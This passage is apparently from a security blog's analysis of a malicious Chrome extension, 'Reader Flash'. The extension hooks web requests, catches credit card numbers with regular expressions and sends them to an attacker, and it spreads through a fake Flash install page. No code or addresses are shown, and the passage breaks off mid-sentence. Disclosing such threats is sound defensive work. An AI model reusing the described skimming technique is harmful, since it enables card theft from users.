The extension seems to be a ‘Reader Flash’ created by the supposed developer fbsgang.info. Once installed, it embeds a simple function within all the web sites visited by the user. Particularly, it exploits the API functionality webRequest.onBeforeRequest, so allowing to register a ‘hook’ which will be called just before the user may send a new HTTP request from the web site (for instance, by clicking on a link or submitting a form).
This registered function monitors, by means of regular expressions, credit card numbers (if you look at the code you will realize that there are regular expressions for Visa (vvregex), MasterCard (mcregex), etc. That is, in case of any of the data included in the request is a card number, these numbers –encoded in JSON– will be sent to the attacker through an AJAX request. In particular, it uses the “sendFormData” function, which contains the base64-encoded end URL:
That, once decoded, is:
As you can see, it is a simple extension that takes advantage of the huge scope of a single API call. When it was detected, this extension had been installed 400 times. The infrastructure has not been massively spread so far. It is available on the Chrome Web Store from February 2018, however, as the attacker only made public the extension to those who knew the link, it cannot be found through a ‘usual’ search.
So, how is it spread?
The point is that the authors have not correctly finalized the snippet yet (or they have disabled it for any reason), so the current content it presents is the index of server files:
This doesn’t affect the extension, just its way of spreading. If we ‘go back’ on time, we can specifically see that its previous appearance was much more credible:
If we check its source code:
That is to say, it requests the users to install Adobe Flash or redirects them to Chrome extension market (specifically to the extension that we have remarked at the beginning). Closing the infection circle and the information theft,